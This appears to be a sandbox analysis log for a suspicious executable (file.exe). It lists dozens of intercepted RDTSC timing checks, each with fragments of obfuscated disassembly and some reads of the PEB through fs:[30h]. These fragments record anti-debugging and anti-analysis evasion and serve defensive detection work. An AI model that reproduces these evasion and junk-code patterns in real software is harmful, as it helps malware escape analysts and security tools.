Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A589FE second address: A58A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5834E second address: A5836C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEEE0EE3606h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jnl 00007FEEE0EE360Ch 0x00000013 popad 0x00000014 pushad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5836C second address: A58386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEEE08A2313h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58386 second address: A5838A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A584F5 second address: A58521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE08A2319h 0x00000009 popad 0x0000000a jmp 00007FEEE08A230Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58521 second address: A58526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B726 second address: A5B744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jg 00007FEEE08A2306h 0x00000011 jnp 00007FEEE08A2306h 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B744 second address: A5B753 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FEEE0EE3606h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B753 second address: A5B760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B760 second address: A5B764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B764 second address: A5B768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F5E second address: A67F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F62 second address: A67F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEE08A2316h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F7E second address: A67F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F88 second address: A67F8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F8E second address: A67F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F97 second address: A67F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0289 second address: 9A02A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FEEE0EE3606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007FEEE0EE3606h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84364 second address: A8436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8436A second address: A84374 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEEE0EE3606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82E72 second address: A82E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82E76 second address: A82E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82FCB second address: A82FD5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82FD5 second address: A82FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82FDB second address: A82FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82FDF second address: A8300A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEEE0EE3619h 0x00000011 jp 00007FEEE0EE3606h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8300A second address: A8300E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8300E second address: A83014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83014 second address: A8301E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8317A second address: A831A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jns 00007FEEE0EE3606h 0x0000000d jmp 00007FEEE0EE3616h 0x00000012 popad 0x00000013 pushad 0x00000014 js 00007FEEE0EE3606h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A831A7 second address: A831AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A832F6 second address: A832FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A832FC second address: A8330C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FEEE08A230Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8330C second address: A83314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83314 second address: A83335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEEE08A230Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87CD6 second address: A87CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D549 second address: A8D54D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D3C6 second address: A8D3DB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEEE0EE360Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FEEE0EE3606h 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9757D second address: A97585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92B6D second address: A92B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92B73 second address: A92B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5638 second address: AA5654 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEEE0EE3612h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5654 second address: AA565B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA52D4 second address: AA52D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA52D8 second address: AA52EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FEEE08A230Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACE90 second address: AACE9A instructions: 0x00000000 rdtsc 0x00000002 je 00007FEEE0EE360Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC237 second address: AAC23E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC3A0 second address: AAC3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC3AA second address: AAC3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC942 second address: AAC957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE3611h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB13DF second address: AB13FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB14A1 second address: AB14AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FEEE0EE3606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB16A1 second address: AB16B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F5A second address: AB2F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE360Fh 0x00000009 jmp 00007FEEE0EE360Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE0EE3613h 0x00000015 jmp 00007FEEE0EE360Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F9A second address: AB2FA4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEEE08A2306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51A3 second address: AB51AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51AD second address: AB51B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB08AB second address: 4DB094C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEEE0EE3610h 0x00000008 jmp 00007FEEE0EE3615h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushfd 0x00000011 jmp 00007FEEE0EE3610h 0x00000016 adc cx, D888h 0x0000001b jmp 00007FEEE0EE360Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ecx 0x00000023 jmp 00007FEEE0EE3616h 0x00000028 call dword ptr [74E5188Ch] 0x0000002e mov edi, edi 0x00000030 push ebp 0x00000031 mov ebp, esp 0x00000033 push ecx 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003a mov dword ptr [ebp-04h], ecx 0x0000003d cmp ecx, 01000000h 0x00000043 jc 00007FEEE0F150E5h 0x00000049 mov eax, 7FFE0320h 0x0000004e mov eax, dword ptr [eax] 0x00000050 mul ecx 0x00000052 shrd eax, edx, 00000018h 0x00000056 mov esp, ebp 0x00000058 pop ebp 0x00000059 ret 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007FEEE0EE360Eh 0x00000061 xor cx, 2E18h 0x00000066 jmp 00007FEEE0EE360Bh 0x0000006b popfd 0x0000006c mov ah, 51h 0x0000006e popad 0x0000006f pop ecx 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FEEE0EE360Dh 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB094C second address: 4DB0961 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0961 second address: 4DB07BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007FEEE0EE3613h 0x0000000b adc cx, 7CEEh 0x00000010 jmp 00007FEEE0EE3619h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 ret 0x0000001a nop 0x0000001b xor esi, eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007FEEE5890EDAh 0x00000026 mov edi, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07BC second address: 4DB07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07C0 second address: 4DB07D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07D8 second address: 4DB07DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07DE second address: 4DB07E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07E2 second address: 4DB07E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9004B second address: 4D90082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov ebx, 350F4010h 0x0000000e mov dx, 4D3Ch 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FEEE0EE3611h 0x0000001b jmp 00007FEEE0EE360Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov edx, esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90082 second address: 4D900DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FEEE08A230Eh 0x0000000e mov eax, dword ptr fs:[00000030h] 0x00000014 pushad 0x00000015 jmp 00007FEEE08A230Eh 0x0000001a mov si, 3401h 0x0000001e popad 0x0000001f sub esp, 18h 0x00000022 pushad 0x00000023 mov edx, esi 0x00000025 mov edi, eax 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 jmp 00007FEEE08A2310h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FEEE08A230Eh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D900DE second address: 4D900E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D900E4 second address: 4D90140 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov cx, 7043h 0x00000011 mov bx, ax 0x00000014 popad 0x00000015 mov ebx, dword ptr [eax+10h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FEEE08A2317h 0x00000021 sub cx, B09Eh 0x00000026 jmp 00007FEEE08A2319h 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90140 second address: 4D90145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902BB second address: 4D902E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, D11Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902E2 second address: 4D902E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902E7 second address: 4D902ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902ED second address: 4D902F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902F1 second address: 4D9033D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FEEE08A2314h 0x00000012 or si, EF18h 0x00000017 jmp 00007FEEE08A230Bh 0x0000001c popfd 0x0000001d call 00007FEEE08A2318h 0x00000022 pop eax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9033D second address: 4D90383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b push ebx 0x0000000c jmp 00007FEEE0EE3618h 0x00000011 pop eax 0x00000012 popad 0x00000013 push dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FEEE0EE360Ah 0x0000001d mov ecx, 1DDA3E11h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90383 second address: 4D903C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 mov ax, 027Bh 0x00000014 movzx eax, bx 0x00000017 popad 0x00000018 push dword ptr [eax+18h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FEEE08A2315h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903C9 second address: 4D903CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D903CF second address: 4D903D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90475 second address: 4D9047B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9047B second address: 4D904C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e jmp 00007FEEE08A230Eh 0x00000013 mov dword ptr [esi+0Ch], eax 0x00000016 jmp 00007FEEE08A2310h 0x0000001b mov eax, dword ptr [ebx+4Ch] 0x0000001e pushad 0x0000001f mov si, di 0x00000022 popad 0x00000023 mov dword ptr [esi+10h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D904C3 second address: 4D904D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D904D3 second address: 4D904F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+50h] 0x0000000f pushad 0x00000010 call 00007FEEE08A230Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D904F0 second address: 4D90535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov bx, F06Ah 0x00000009 popad 0x0000000a mov dword ptr [esi+14h], eax 0x0000000d jmp 00007FEEE0EE3611h 0x00000012 mov eax, dword ptr [ebx+54h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FEEE0EE360Ch 0x0000001c and ecx, 50E35058h 0x00000022 jmp 00007FEEE0EE360Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a push esi 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90535 second address: 4D90568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+18h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEEE08A2317h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90568 second address: 4D905D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d mov esi, 3BB48063h 0x00000012 pushfd 0x00000013 jmp 00007FEEE0EE3618h 0x00000018 or esi, 482736A8h 0x0000001e jmp 00007FEEE0EE360Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esi+1Ch], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FEEE0EE3615h 0x0000002f rdtsc
